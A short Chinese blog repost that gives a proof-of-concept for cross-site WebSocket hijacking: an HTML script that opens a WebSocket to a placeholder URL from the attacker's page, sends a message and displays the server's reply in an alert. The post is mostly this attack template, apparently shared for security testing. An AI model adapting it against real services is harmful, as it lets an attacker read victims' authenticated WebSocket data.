websock跨域劫持
作者:互联网
websock跨域劫持
poc:
<meta charset="utf-8">
<script>
function ws_attack(){//自定义函数ws_attack
//定义函数功能
//创建WebSocket并赋值给ws变量
var ws = new WebSocket("url");//如果请求的Websocket服务仅支持HTTP就写成ws://,如果请求的Websocket服务支持HTTPs就写成wss://
ws.onopen = function(evt) {
//当ws(WebSocket)处于连接状态时执行
ws.send("test websocket"); };
ws.onmessage = function(evt)
{ //当ws(WebSocket)请求有响应信息时执行
alert(evt.data)
//注意:响应的信息可以通过evt.data获取!例如:alert(evt.data);
ws.close();
}; }
ws_attack();
//执行ws_attact函数
</script>
标签:function,劫持,WebSocket,跨域,data,attack,ws,websock,evt 来源: https://www.cnblogs.com/akihi-lu1l/p/13236968.html